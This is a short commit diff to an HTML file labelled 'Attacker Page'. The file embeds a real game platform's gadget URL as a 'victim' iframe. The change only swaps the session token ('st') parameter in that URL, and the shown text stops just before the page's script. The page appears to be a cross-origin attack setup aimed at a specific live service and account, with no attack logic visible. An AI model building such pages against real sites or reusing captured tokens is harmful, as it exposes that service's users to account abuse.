Modify iframe source URL in attacker page
Updated iframe source URL parameters for the victim iframe.

--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=ebb3FRMv8rxFf7EYd1b8v%2FICvGpppZI1iWC8s4s4m4zGio9Zf6merN4fdoEN6DiaEIvyE8fOhGRl%2BB3ulzO8MDgJ%2BPZKL56loXxDO%2BH4NiE9oCcz%2FemhhuNKepnFLMfPyie5QnnnccKn1pHtw5iKmmnGlziSd3Z1S%2FAzOgC5I9fak5BIFVjibH5sizTs%2BLsly4uvMUYwsHFHKOkxJLdcFxu32KajZspWMyG8vS349tA8HptVrxCXHdOnp%2FWeJ78JLoIBzlHej9zy34fUs%2BaPjNX2i%2FM%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=5Nq77QH0VmtqlRVHzUiic7qhz%2BX3sgT5XOxwLyTDiZ7olFNE9dIxEAX9ATSCe6j1K71NP4VbJIOhtcd%2BeMEnRJAygDlnuMjB2rhN8M5PCpJqxQwndaxV5g1305chON0rQSoo1GSPnQYCqjo5nbW5BANRXV%2BOtCiFWpFHe2Vz7qC2so2SQqiLYH5eI1mRCLy%2B%2FAsuC5eX16Ho3BKERm%2BUJ6nfWQRIJma0t%2FABhciCtfN1SVJMBWDabiaqPc18lT4XLU1Y%2F54rjOgyU6IRyzJ78I6e69A%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
